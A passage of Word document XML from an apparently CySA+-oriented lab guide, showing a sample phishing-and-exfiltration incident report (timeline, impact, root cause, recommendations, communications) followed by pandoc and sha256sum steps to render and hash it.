        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:05    | C2 heartbeat begins to 185.220.101.45                  | Lab 4 beacon        |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:15    | EDR alert raised; ticket INC-001 opened                | EDR, ticket system  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:20    | Brute-force noise observed on FS01 (Lab 7)             | auth.log            |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:30    | Compromised account disabled at IdP                    | IdP audit log       |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:30    | Outbound 1 GB flow to attacker domain                  | NetFlow             |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:45    | FN-WS-014 network-isolated (Lab 24)                    | firewall log        |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 09:30    | Memory + disk imaged for forensics (Lab 21)            | Chain of custody    |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 11:00    | Workstation re-imaged; user retrained                  | Endpoint mgmt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4. Impact and scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Confidentiality:** ~1 GB exfiltrated. Sample contains: 87 customer records (names, IBANs, emails). Falls under GDPR (notification within 72 h).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Integrity:** No evidence of modification on FS01.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Availability:** None. Production was not interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Scope:** 1 user, 1 workstation, 1 file share path `/finance/customers/`.</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5. Evidence (CySA+ 4.2 "Evidence")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| ID | Item | Hash (SHA-256) | Custodian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EV-001 | FN-WS-014 disk image | `a1b2c3…` | Forensics (locker 3) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| EV-002 | FN-WS-014 memory image | `d4e5f6…` | Forensics (locker 3) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| EV-003 | Phishing email .eml | `070809…` | SOC archive |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| EV-004 | Outbound netflow window | `0a0b0c…` | SOC archive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Chain of custody form: see CASE-001 chain_of_custody.md (Lab 21).</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6. Root cause analysis (CySA+ 4.2 "Root cause analysis")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Layer | Failure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**Email** | DMARC policy on receiving domain set to `none` — forgery passed quarantine. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| **Endpoint** | Macros allowed from internet zone; PowerShell constrained-language mode disabled. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| **Identity** | MFA was OTP, not phishing-resistant; reusable credential captured. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| **Network** | Egress from finance VLAN to TOR exits was not blocked. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| **Detection** | SIEM rule for beaconing existed but threshold too lenient (&gt;30 s).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7. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| # | Recommendation | Owner | Target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1 | Enforce DMARC `p=reject` on receiving gateway | Email Ops | 2026-05-31 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 2 | Block macros from internet zone via Group Policy | Endpoint | 2026-05-20 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 3 | Roll out FIDO2 keys for Finance + Exec | IdAM | 2026-07-01 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 4 | Egress filter: deny TOR exit nodes at perimeter | NetOps | 2026-05-22 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 5 | Tighten SIEM beaconing detection (&lt;= 60 s, jitter aware) | Detection eng | 2026-06-10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8. Lessons learned (CySA+ 4.2 "Lessons learned")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Worked:** Tabletop muscle memory (Lab 25). IC named within 5 min.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Worked:** Pre-built isolation runbook applied cleanly (Lab 24).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Failed:** Out-of-band Signal group was 3 months out of date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Failed:** No standing template for the regulator notification — Legal had to draft from scratch under pressure.</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9. Metrics and KPIs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Metric | Value | Target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Mean time to **detect** (MTTD) | 15 min | &lt; 30 min |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Mean time to **respond** (MTTR-r) | 45 min | &lt; 1 h |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Mean time to **remediate** (MTTR-m) | 3 h | &lt; 4 h |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Alert volume (24 h) | 412 → 1 incident | n/a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10. Communications (CySA+ 4.2 "Communications")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Audience | Channel | Sender | Sent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Executive | Email + bridge | CISO | 09:00 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Affected customers | Templated email | Comms | 13:00 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Regulator (GDPR DPA) | Web form + signed letter | Legal | within 72 h |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Law enforcement (cybercrime unit) | Phone + signed referral | Legal | 14:00 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Public relations / media | Holding statement only | Comms | as needed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11. Incident declaration &amp; escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Sev: **1**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Declared by: SOC Lead Analyst</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Time declared: 08:30 UTC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Escalation: CISO @ 08:35, CEO @ 09:00, Legal @ 09:15</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12. Stakeholder identification (CySA+ 4.2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CISO; CEO; CFO (because Finance scope); Legal; Comms; Engineering platform; Affected customers; Supervisory Authority (regulator); Cyber-insurance carrier.</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*End of report.*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Render and seal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pandoc incident_report.md -s -o incident_report.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum incident_report.* &gt; MANIFEST.sha256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls -lh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The hash is the seal — once distributed, any edit changes the hash and breaks the audit trail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Map every section to CySA+ 4.2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CySA+ 4.2 bullet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1 Exec summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Executive summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2 W/W/W/W/W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Who, what, when, where, and why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3 Timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4 Impact / scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Impact, Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5 Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
